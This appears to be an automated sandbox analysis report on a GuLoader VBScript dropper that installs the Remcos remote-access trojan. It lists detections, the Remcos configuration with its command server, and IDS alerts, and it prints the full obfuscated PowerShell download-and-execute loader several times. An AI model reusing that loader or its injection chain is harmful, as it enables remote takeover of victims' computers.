
Windows Analysis Report
Sublabially.vbs

Overview

General Information

Sample name:Sublabially.vbs
Analysis ID:1576526
MD5:c4189a98b8eda94cb6632e57fe824155
SHA1:0455b4277f9ad2e1ed9d6349c9459a843ddf5dff
SHA256:9ab13f3f467c2ee1421b70d642789f7ee63bdf94841bd612e5ffa44c041a9a45
Tags:vbsuser-abuse_ch

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Potential malicious VBS script found (suspicious strings)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7448 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Sublabially.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7536 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$handsaws='Underhive';;$Hjlpevinduernes='genernrr';;$Skovspurvenes='Folkekre';;$Fremsende='Peddigrrets';;$kbelysten=$host.Name; function Astroite($Moedt){If ($kbelysten) {$Potheen='Madelines214';$Spildendes=4;$Racketlike=$Spildendes}do{$Harpers+=$Moedt[$Racketlike];$Racketlike+=5} until(!$Moedt[$Racketlike])$Harpers}function Forvanskende($Piphas119){ .($criminologist) ($Piphas119)}$Redefinerende=Astroite 'vascnVer,e roeT Oto.UhyrW';$Redefinerende+=Astroite 'charEmel,B Si,CAnetL skiIbreceFeltNK.ont';$Adkomsthaveren=Astroite 'ChepMUnwooK lizRangiLattlst nl Cena Pom/';$knippelgodes=Astroite ' nkT Es lLei s Vit1Plat2';$Grillhandske='Corv[ StanAnlgE inatHjti.OpkasForseF rsR,ineVRudlICo tCBareESlu P SkyoPhotiTendNRealtBr dM UndAUdvanFo fABombG Br e Gr RFol ]Mu,f:Upwe: Il,SGoodeUkolc emuF emRSt mIErraTInteySup.pBen.RPatiO GentUndrOAn yCKlonODia lTi.s= up$s rakM.ndn Acti D.sPKolopRa ie PrsL oweGFlasOByggd V.lEIndfS';$Adkomsthaveren+=Astroite 'Un,a5Hum .Fis.0Bill ,and(Ov rWBoobiKernn MosdB rtoSlotw BoosHand BypNRe,gTpent Re y1Fork0Fa n.Ausp0over; F.n MussW Efti Carn.dea6Neur4Ophi; Syl Wi.dxBhin6Pinm4Cama;Mo,b Drosr F rvQuad:sket1Tot 3Hous1Indg. La 0Urop) Ger GennGonyceT.gtc prokUne o Ind/skal2Josi0Pins1 Ord0Fu o0 Frm1Ov r0P op1Aeg. 
CyklF,fpaiCombrTeate UndfStyloDef x Spa/ g s1Orch3 mo,1 Men.dato0';$Racketlikenddateringsfase=Astroite ' .utUUnmuSConse F eR Fo - Raca S rGSta.eMor,n verT';$Aandsaristokratens=Astroite 'DoblhUndetSa dtStrapAntesS mm:Skru/opsl/ Timi frugClep2RentcOr,h.KlapiAtelc Ancu Tra/KludZDopitComby groSBiorv.ctuRBystyL ngzSeis/ RevBMblelTrvluHemisGrimt AppeoverrRinkeRhinrDiff.Dor dSpadeSkarpsodfl Como enzy';$Tryksager=Astroite ' elm>';$criminologist=Astroite 'Hulli BonEBat.x';$Lnindkomsts='Noncontingency';$breadbox='\misinforms.Non';Forvanskende (Astroite ' Skr$Rm bgSv nLparaoTappBMa uAU melBema:FaktcShrii hosFllesbehaEOpunlPuin= Und$Uns.ESandnIntoVDien:Jac AUn epCullpKammdAnglAElektPs uA Sub+Fo n$ EskBSubsrBarneThora PlaDDepeB D mOSni X');Forvanskende (Astroite ' an$Sprog.krsLSti OKlieBRefaAB.ggL A.k:Subcg RumRChowA RekMU deMChicONeooFAfveoParan MokEMicrRS agSPely=Baz $F,beAOutwAJab,NNaphDTrres EagA cykRObseICop,SHkketEntiOPennk TypRKlynaEdapt inge.jern dsmSOutw. Va,SsubdPVerdLUnsiINa sT Fry( Ski$spectS lvR ssiy.rank Bars Teka hangKemie raR Cal)');Forvanskende (Astroite $Grillhandske);$Aandsaristokratens=$Grammofoners[0];$Couloir4=(Astroite ',obb$SurnGPublL BikoSupebBazeAFantl lin: rinDStibi,ornf A hfhalmECongRHeadE UdrNUdebTCohaiundeaUnth= ,erNCedae DoyWSkil- DiboB,dgbF rrjM skE eluc afht Udr WatSunmoYDhfpSTribTEctoeCaroMhyst. Ven$SvarRS weeskylD ouseUnexfOpunIDissN dviE B kr rane,arsNKa tdu dee');Forvanskende ($Couloir4);Forvanskende (Astroite ' Moo$ yloD Bu,i.obbfAandfSonneTartr .ydeSkafnL,svt SyriUnivaFio . 
enHSexte.neoaSchfdUdgieEjerrGemisSemi[ti m$ AgrR rkba Forc Klukkerme ,nttO,idl Unsi.riuk I le S.hn valdLdredButuaOmprtP kteRe orRegiifjten ResgStrosTweefJoseaS ilsQuesetoup] U b= de $ProtAPrv.dMa nkKontoShorm Gu.s L,gtFa thtolkaCemevIlteeUnder C.se Altn');$Noncorruptible=Astroite 'Demo$Sv.rDReraiSpejfA enf EkseFussr gnaeLexinMetatA teiHou aAfsk.Rea.DSpr oLejewInapnDa,blDi qoCowhaSentdDe,aFOptnitotalDefoe,ami(Exoc$Phr,AtheoaFestnGenndT hosGentaSpolrHjlpi rtesSkumttairoLinak athr EmoaW ittLtgbe defnMedhs Yoy,Prob$ RekWFor hHa voMutoo Ga,p,keleHumrrvanis ,yd)';$Whoopers=$Cissel;Forvanskende (Astroite 'R se$Ma igPus ltocho SlgB esa RokLSpl,:Avi e BerM GodA raklKla JStadR Po eCamaRIdylnAtmoeLeas=Indr(EnfetPer e BraSKolltUopd- Gh pForea U,lt PriH Res Cor,$Tot.w PenhIsocOInteodaispDi sEBigaRCholsDugd)');while (!$Emaljrerne) {Forvanskende (Astroite 'Cond$Aracg,edelProjo .ocbGiftaLaurlRigs: Tand HypeSubiuTe,rtP rkeCoatrRdesoB ffeFly lFyraa Va.ssprntNonpo C msA soeOldd=.loa$LystT.urneStabkSpndsFamitVealaUb snChonmDatarun ekSrsknEmb,icelen SkigSprgeIns.nAtoms') ;Forvanskende $Noncorruptible;Forvanskende (Astroite 'Tr.kSSunnTF ssaPar RBlotTSumm-F.gmsV olLPer,eBemaeIndiP Kam Indf4');Forvanskende (Astroite 'Pr,s$AarsGEftelAfshOKalob MulaBunklFo.k:carpEencoMDecyaC tolNonlJKandrBetaeVerdrRisin ExcEDamp=Para(DipatTr feWarrsInviTKlap- WeipUnspABr,lTDkfaH irs Omkl$Gr sW d ahPateOH fto ufPSepaEKde rForfSRick)') ;Forvanskende (Astroite 'Prof$Sol.g ExtLs dhOAra BSommABaluLPlad: nsF reco .slLareodJ.wsESamodPalmRGlooSHemm=Qua.$ oligradiLSkabOord bKaboARaptLPdag:CultePersA,emiSIndiTColuEElecdAnch+Unmi+Anoi% esu$Pantg nfiRSlutaC,tem nbeMAm.ho.ietfsquao Ch NmaniENy iRDis sGe n.AmniC SploHonoU BrenAntiT') ;$Aandsaristokratens=$Grammofoners[$Foldedrs]}$Drslagenes=312252;$Naturaliseringer=30375;Forvanskende (Astroite ' Cap$fo sgEfteLhyd oSh iBUdenA ColLOtte:TerrI remDUdbiEForhp De oBrndSOgleEN,nvrlame La t=Inte Paneg C ae Dists ld-Ro tCKonsoPodoNGynoTIndkELuthn SnetT ed Ind$ForsWbo 
rhT.inowineoAft p darEDr arB rgS');Forvanskende (Astroite 'Arc.$.olegBetalNa no ansbRecaaudsalNigr:F coG Blol CloaUnsusBeskpKalvuStadsSkrptT ykeNoddrOcelnBindeTi.m samm=Mis Ti b[La,oSErhvyMosts,midt OrieParcmAd p.KvadCExpeoUordn tomvRec eTrafrsty tSkud]mine:U,fo: SogFSel rLynioBoatmExtrBJaf aP itsV jkel xe6Hem 4LikeSChatt alarMedliLimbnActigM rl(Firm$HalviA.dedTrice ccp Seno apsssca eForbrGeop)');Forvanskende (Astroite 'Spat$nordGEvanlHowsoR asbPeroAUni l Gre: NotAKontd IndEfilbN.mpoo SveideceDGlu IFlu,stuneM gri Exe,= ttt Ga.e[EbliSKrityAdelS D.aT Y.geH rrM A l.CagptI dgEChemXUnclTSe i.InvoeMargn InvCTrkko SaxDMattISystnBordG on] Tea:Abol:Ung.aSsatS Il CAutoiPe,siLexi.SterGTa eERa eTSubcs gi TJokeRBathI nthNSkylGOper( np$QuaiG H sLBageadexisTrinPTrb,UAd,eSAs nt UndEGalaRFoliNadskE W n)');Forvanskende (Astroite 'Bill$SmedgTurnL FulosmutB Reia.etrLScro: YppiCakiNS euTNonteAlburfornIMermmglebsKunsBFortePoseV musiRec,SOrneE,overItalSBrig= Run$PinoaCorodStraERekon regoLni IIdy D G diSpuls HetM F r.MennsHjrnuRehybUnp sUnfoTE rir Musi StoNbeskGA ay(Barm$SptmDUforRE,teSSandlArbeaExeng M,lEBe knSkilELukkSIden,Iceb$ AnonInteAAfbeTItyluSub rStudaU palAfv.I RomSSejlEP,tarPosiItr pNCe tgEnt,EMagyRUnag)');Forvanskende $interimsbevisers;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 7824 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$handsaws='Underhive';;$Hjlpevinduernes='genernrr';;$Skovspurvenes='Folkekre';;$Fremsende='Peddigrrets';;$kbelysten=$host.Name; function Astroite($Moedt){If ($kbelysten) {$Potheen='Madelines214';$Spildendes=4;$Racketlike=$Spildendes}do{$Harpers+=$Moedt[$Racketlike];$Racketlike+=5} until(!$Moedt[$Racketlike])$Harpers}function Forvanskende($Piphas119){ .($criminologist) ($Piphas119)}$Redefinerende=Astroite 'vascnVer,e roeT Oto.UhyrW';$Redefinerende+=Astroite 'charEmel,B Si,CAnetL skiIbreceFeltNK.ont';$Adkomsthaveren=Astroite 'ChepMUnwooK lizRangiLattlst nl Cena Pom/';$knippelgodes=Astroite ' nkT Es lLei s Vit1Plat2';$Grillhandske='Corv[ StanAnlgE inatHjti.OpkasForseF rsR,ineVRudlICo tCBareESlu P SkyoPhotiTendNRealtBr dM UndAUdvanFo fABombG Br e Gr RFol ]Mu,f:Upwe: Il,SGoodeUkolc emuF emRSt mIErraTInteySup.pBen.RPatiO GentUndrOAn yCKlonODia lTi.s= up$s rakM.ndn Acti D.sPKolopRa ie PrsL oweGFlasOByggd V.lEIndfS';$Adkomsthaveren+=Astroite 'Un,a5Hum .Fis.0Bill ,and(Ov rWBoobiKernn MosdB rtoSlotw BoosHand BypNRe,gTpent Re y1Fork0Fa n.Ausp0over; F.n MussW Efti Carn.dea6Neur4Ophi; Syl Wi.dxBhin6Pinm4Cama;Mo,b Drosr F rvQuad:sket1Tot 3Hous1Indg. La 0Urop) Ger GennGonyceT.gtc prokUne o Ind/skal2Josi0Pins1 Ord0Fu o0 Frm1Ov r0P op1Aeg. 
CyklF,fpaiCombrTeate UndfStyloDef x Spa/ g s1Orch3 mo,1 Men.dato0';$Racketlikenddateringsfase=Astroite ' .utUUnmuSConse F eR Fo - Raca S rGSta.eMor,n verT';$Aandsaristokratens=Astroite 'DoblhUndetSa dtStrapAntesS mm:Skru/opsl/ Timi frugClep2RentcOr,h.KlapiAtelc Ancu Tra/KludZDopitComby groSBiorv.ctuRBystyL ngzSeis/ RevBMblelTrvluHemisGrimt AppeoverrRinkeRhinrDiff.Dor dSpadeSkarpsodfl Como enzy';$Tryksager=Astroite ' elm>';$criminologist=Astroite 'Hulli BonEBat.x';$Lnindkomsts='Noncontingency';$breadbox='\misinforms.Non';Forvanskende (Astroite ' Skr$Rm bgSv nLparaoTappBMa uAU melBema:FaktcShrii hosFllesbehaEOpunlPuin= Und$Uns.ESandnIntoVDien:Jac AUn epCullpKammdAnglAElektPs uA Sub+Fo n$ EskBSubsrBarneThora PlaDDepeB D mOSni X');Forvanskende (Astroite ' an$Sprog.krsLSti OKlieBRefaAB.ggL A.k:Subcg RumRChowA RekMU deMChicONeooFAfveoParan MokEMicrRS agSPely=Baz $F,beAOutwAJab,NNaphDTrres EagA cykRObseICop,SHkketEntiOPennk TypRKlynaEdapt inge.jern dsmSOutw. Va,SsubdPVerdLUnsiINa sT Fry( Ski$spectS lvR ssiy.rank Bars Teka hangKemie raR Cal)');Forvanskende (Astroite $Grillhandske);$Aandsaristokratens=$Grammofoners[0];$Couloir4=(Astroite ',obb$SurnGPublL BikoSupebBazeAFantl lin: rinDStibi,ornf A hfhalmECongRHeadE UdrNUdebTCohaiundeaUnth= ,erNCedae DoyWSkil- DiboB,dgbF rrjM skE eluc afht Udr WatSunmoYDhfpSTribTEctoeCaroMhyst. Ven$SvarRS weeskylD ouseUnexfOpunIDissN dviE B kr rane,arsNKa tdu dee');Forvanskende ($Couloir4);Forvanskende (Astroite ' Moo$ yloD Bu,i.obbfAandfSonneTartr .ydeSkafnL,svt SyriUnivaFio . 
enHSexte.neoaSchfdUdgieEjerrGemisSemi[ti m$ AgrR rkba Forc Klukkerme ,nttO,idl Unsi.riuk I le S.hn valdLdredButuaOmprtP kteRe orRegiifjten ResgStrosTweefJoseaS ilsQuesetoup] U b= de $ProtAPrv.dMa nkKontoShorm Gu.s L,gtFa thtolkaCemevIlteeUnder C.se Altn');$Noncorruptible=Astroite 'Demo$Sv.rDReraiSpejfA enf EkseFussr gnaeLexinMetatA teiHou aAfsk.Rea.DSpr oLejewInapnDa,blDi qoCowhaSentdDe,aFOptnitotalDefoe,ami(Exoc$Phr,AtheoaFestnGenndT hosGentaSpolrHjlpi rtesSkumttairoLinak athr EmoaW ittLtgbe defnMedhs Yoy,Prob$ RekWFor hHa voMutoo Ga,p,keleHumrrvanis ,yd)';$Whoopers=$Cissel;Forvanskende (Astroite 'R se$Ma igPus ltocho SlgB esa RokLSpl,:Avi e BerM GodA raklKla JStadR Po eCamaRIdylnAtmoeLeas=Indr(EnfetPer e BraSKolltUopd- Gh pForea U,lt PriH Res Cor,$Tot.w PenhIsocOInteodaispDi sEBigaRCholsDugd)');while (!$Emaljrerne) {Forvanskende (Astroite 'Cond$Aracg,edelProjo .ocbGiftaLaurlRigs: Tand HypeSubiuTe,rtP rkeCoatrRdesoB ffeFly lFyraa Va.ssprntNonpo C msA soeOldd=.loa$LystT.urneStabkSpndsFamitVealaUb snChonmDatarun ekSrsknEmb,icelen SkigSprgeIns.nAtoms') ;Forvanskende $Noncorruptible;Forvanskende (Astroite 'Tr.kSSunnTF ssaPar RBlotTSumm-F.gmsV olLPer,eBemaeIndiP Kam Indf4');Forvanskende (Astroite 'Pr,s$AarsGEftelAfshOKalob MulaBunklFo.k:carpEencoMDecyaC tolNonlJKandrBetaeVerdrRisin ExcEDamp=Para(DipatTr feWarrsInviTKlap- WeipUnspABr,lTDkfaH irs Omkl$Gr sW d ahPateOH fto ufPSepaEKde rForfSRick)') ;Forvanskende (Astroite 'Prof$Sol.g ExtLs dhOAra BSommABaluLPlad: nsF reco .slLareodJ.wsESamodPalmRGlooSHemm=Qua.$ oligradiLSkabOord bKaboARaptLPdag:CultePersA,emiSIndiTColuEElecdAnch+Unmi+Anoi% esu$Pantg nfiRSlutaC,tem nbeMAm.ho.ietfsquao Ch NmaniENy iRDis sGe n.AmniC SploHonoU BrenAntiT') ;$Aandsaristokratens=$Grammofoners[$Foldedrs]}$Drslagenes=312252;$Naturaliseringer=30375;Forvanskende (Astroite ' Cap$fo sgEfteLhyd oSh iBUdenA ColLOtte:TerrI remDUdbiEForhp De oBrndSOgleEN,nvrlame La t=Inte Paneg C ae Dists ld-Ro tCKonsoPodoNGynoTIndkELuthn SnetT ed Ind$ForsWbo 
rhT.inowineoAft p darEDr arB rgS');Forvanskende (Astroite 'Arc.$.olegBetalNa no ansbRecaaudsalNigr:F coG Blol CloaUnsusBeskpKalvuStadsSkrptT ykeNoddrOcelnBindeTi.m samm=Mis Ti b[La,oSErhvyMosts,midt OrieParcmAd p.KvadCExpeoUordn tomvRec eTrafrsty tSkud]mine:U,fo: SogFSel rLynioBoatmExtrBJaf aP itsV jkel xe6Hem 4LikeSChatt alarMedliLimbnActigM rl(Firm$HalviA.dedTrice ccp Seno apsssca eForbrGeop)');Forvanskende (Astroite 'Spat$nordGEvanlHowsoR asbPeroAUni l Gre: NotAKontd IndEfilbN.mpoo SveideceDGlu IFlu,stuneM gri Exe,= ttt Ga.e[EbliSKrityAdelS D.aT Y.geH rrM A l.CagptI dgEChemXUnclTSe i.InvoeMargn InvCTrkko SaxDMattISystnBordG on] Tea:Abol:Ung.aSsatS Il CAutoiPe,siLexi.SterGTa eERa eTSubcs gi TJokeRBathI nthNSkylGOper( np$QuaiG H sLBageadexisTrinPTrb,UAd,eSAs nt UndEGalaRFoliNadskE W n)');Forvanskende (Astroite 'Bill$SmedgTurnL FulosmutB Reia.etrLScro: YppiCakiNS euTNonteAlburfornIMermmglebsKunsBFortePoseV musiRec,SOrneE,overItalSBrig= Run$PinoaCorodStraERekon regoLni IIdy D G diSpuls HetM F r.MennsHjrnuRehybUnp sUnfoTE rir Musi StoNbeskGA ay(Barm$SptmDUforRE,teSSandlArbeaExeng M,lEBe knSkilELukkSIden,Iceb$ AnonInteAAfbeTItyluSub rStudaU palAfv.I RomSSejlEP,tarPosiItr pNCe tgEnt,EMagyRUnag)');Forvanskende $interimsbevisers;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 7832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 8088 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": ["154.216.18.216:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-7K8JAD", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source | Rule | Description | Author
00000005.00000002.1748100726.0000000008700000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
00000007.00000002.2649817843.0000000006C6F000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000007.00000002.2649989202.0000000006CAA000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000005.00000002.1748291655.000000000994F000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
00000005.00000002.1728698519.0000000005995000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
Source | Rule | Description | Author
amsi64_7536.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi32_7824.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
Matched strings for INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC (offset: identifier: string):
  • 0xa823:$b2: ::FromBase64String(
  • 0x98a8:$s1: -join
  • 0x3054:$s4: +=
  • 0x3116:$s4: +=
  • 0x733d:$s4: +=
  • 0x945a:$s4: +=
  • 0x9744:$s4: +=
  • 0x988a:$s4: +=
  • 0x138c1:$s4: +=
  • 0x13941:$s4: +=
  • 0x13a07:$s4: +=
  • 0x13a87:$s4: +=
  • 0x13c5d:$s4: +=
  • 0x13ce1:$s4: +=
  • 0xa0cb:$e4: Get-WmiObject
  • 0xa2ba:$e4: Get-Process
  • 0xa312:$e4: Start-Process
  • 0x14545:$e4: Get-Process

System Summary

Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Sublabially.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Sublabially.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Sublabially.vbs", ProcessId: 7448, ProcessName: wscript.exe
Source: Network Connection; Author: frack113; Data: DestinationIp: 172.67.210.11, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 8088, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49815
Source: Process started; Author: Michael Haag; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Sublabially.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Sublabially.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Sublabially.vbs", ProcessId: 7448, ProcessName: wscript.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$handsaws='Underhive';;$Hjlpevinduernes='genernrr';;$Skovspurvenes='Folkekre';;$Fremsende='Peddigrrets';;$kbelysten=$host.Name; function Astroite($Moedt){If ($kbelysten) {$Potheen='Madelines214';$Spildendes=4;$Racketlike=$Spildendes}do{$Harpers+=$Moedt[$Racketlike];$Racketlike+=5} until(!$Moedt[$Racketlike])$Harpers}function Forvanskende($Piphas119){ .($criminologist) ($Piphas119)}$Redefinerende=Astroite 'vascnVer,e roeT Oto.UhyrW';$Redefinerende+=Astroite 'charEmel,B Si,CAnetL skiIbreceFeltNK.ont';$Adkomsthaveren=Astroite 'ChepMUnwooK lizRangiLattlst nl Cena Pom/';$knippelgodes=Astroite ' nkT Es lLei s Vit1Plat2';$Grillhandske='Corv[ StanAnlgE inatHjti.OpkasForseF rsR,ineVRudlICo tCBareESlu P SkyoPhotiTendNRealtBr dM UndAUdvanFo fABombG Br e Gr RFol ]Mu,f:Upwe: Il,SGoodeUkolc emuF emRSt mIErraTInteySup.pBen.RPatiO GentUndrOAn yCKlonODia lTi.s= up$s rakM.ndn Acti D.sPKolopRa ie PrsL oweGFlasOByggd V.lEIndfS';$Adkomsthaveren+=Astroite 'Un,a5Hum .Fis.0Bill ,and(Ov rWBoobiKernn MosdB rtoSlotw BoosHand BypNRe,gTpent Re y1Fork0Fa n.Ausp0over; F.n MussW Efti Carn.dea6Neur4Ophi; Syl Wi.dxBhin6Pinm4Cama;Mo,b Drosr F rvQuad:sket1Tot 3Hous1Indg. La 0Urop) Ger GennGonyceT.gtc prokUne o Ind/skal2Josi0Pins1 Ord0Fu o0 Frm1Ov r0P op1Aeg. 
CyklF,fpaiCombrTeate UndfStyloDef x Spa/ g s1Orch3 mo,1 Men.dato0';$Racketlikenddateringsfase=Astroite ' .utUUnmuSConse F eR Fo - Raca S rGSta.eMor,n verT';$Aandsaristokratens=Astroite 'DoblhUndetSa dtStrapAntesS mm:Skru/opsl/ Timi frugClep2RentcOr,h.KlapiAtelc Ancu Tra/KludZDopitComby groSBiorv.ctuRBystyL ngzSeis/ RevBMblelTrvluHemisGrimt AppeoverrRinkeRhinrDiff.Dor dSpadeSkarpsodfl Como enzy';$Tryksager=Astroite ' elm>';$criminologist=Astroite 'Hulli BonEBat.x';$Lnindkomsts='Noncontingency';$breadbox='\misinforms.Non';Forvanskende (Astroite ' Skr$Rm bgSv nLparaoTappBMa uAU melBema:FaktcShrii hosFllesbehaEOpunlPuin= Und$Uns.ESandnIntoVDien:Jac AUn epCullpKammdAnglAElektPs uA Sub+Fo n$ EskBSubsrBarneThora PlaDDepeB D mOSni X');Forvanskende (Astroite ' an$Sprog.krsLSti OKlieBRefaAB.ggL A.k:Subcg RumRChowA RekMU deMChicONeooFAfveoParan MokEMicrRS agSPely=Baz $F,beAOutwAJab,NNaphDTrres EagA cykRObseICop,SHkketEntiOPennk TypRKlynaEdapt inge.jern dsmSOutw. Va,SsubdPVerdLUnsiINa sT Fry( Ski$spectS lvR ssiy.rank Bars Teka hangKemie raR Cal)');Forvanskende (Astroite $Grillhandske);$Aandsaristokratens=$Grammofoners[0];$Couloir4=(Astroite ',obb$SurnGPublL BikoSupebBazeAFantl lin: rinDStibi,ornf A hfhalmECongRHeadE UdrNUdebTCohaiundeaUnth= ,erNCedae DoyWSkil- DiboB,dgbF rrjM skE eluc afht Udr WatSunmoYDhfpSTribTEctoeCaroMhyst. Ven$SvarRS weeskylD ouseUnexfOpunIDissN dviE B kr rane,arsNKa tdu dee');Forvanskende ($Couloir4);Forvanskende (Astroite ' Moo$ yloD Bu,i.obbfAandfSonneTartr .ydeSkafnL,svt SyriUnivaFio . enHSexte.neoaSchfdUdgieEjerrGemisSemi[ti m$ AgrR rkba Forc Klukkerme ,nttO,idl Unsi.riuk I le S.hn valdLdredButuaOmprtP kteRe orRegiifjten ResgStrosTweefJo

Stealing of Sensitive Information

Source: Registry Key set; Author: Joe Security; Data: Details: F6 D9 F9 01 8F BC 7D 88 8A C0 4F 4E 28 1D 60 D6 04 B7 A4 2D C8 1F 38 A3 F2 36 66 57 7D 18 72 E2 E9 6B B9 93 04 47 D0 F2 62 EA 6E 13 DD 23 D4 5F 7D 4A C0 D4 C3 79 F4 AE 21 C3 40 A0 FF DA AD D9 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 8088, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-7K8JAD\exepath
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-17T08:29:21.022618+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49973 | 154.216.18.216 | 2404 | TCP
2024-12-17T08:30:42.265024+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49826 | 154.216.18.216 | 2404 | TCP
2024-12-17T08:31:05.313531+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49877 | 154.216.18.216 | 2404 | TCP
2024-12-17T08:31:28.343680+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49925 | 154.216.18.216 | 2404 | TCP
